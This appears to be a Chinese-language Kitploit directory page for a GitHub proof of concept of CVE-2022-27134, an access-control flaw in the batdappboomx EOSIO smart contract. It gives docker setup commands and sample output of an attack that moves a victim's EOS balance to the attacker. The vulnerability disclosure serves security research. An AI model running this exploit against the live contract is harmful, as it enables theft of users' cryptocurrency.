Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-batdappboomx — CVE-2022-27134 | Kitploit
工具/GitHubGitHub/kenun99/cve-batdappboomx
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubkenun99/cve-batdappboomx

CVE-batdappboomx

CVE-2022-27134

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE ID

CVE-2022-27134

产品

batdappboomx 是一个运行在 EOSIO 区块链 上的公开智能合约。该智能合约向参与者奖励加密货币,但前提是他们需要事先支付一些加密货币。

版本

该智能合约的最新版本。智能合约的 SHA256 哈希值为 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 可在区块浏览器 https://bloks.io/account/batdappboomx 查看。

问题类型

访问控制漏洞

描述

batdappboomx 并非开源,但我们通过 WASAI 发现了一个漏洞。攻击者可以在不支付任何费用的情况下加入这个游戏。

  1. 激活环境
root@kitploit:~
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm  --network host -it localhost/client-eos:eos
  1. 攻击受害者并窃取其加密货币,即 EOS
root@kitploit:~
info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]
...
warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00

[+] 攻击成功。获得了更多加密货币。
下载工具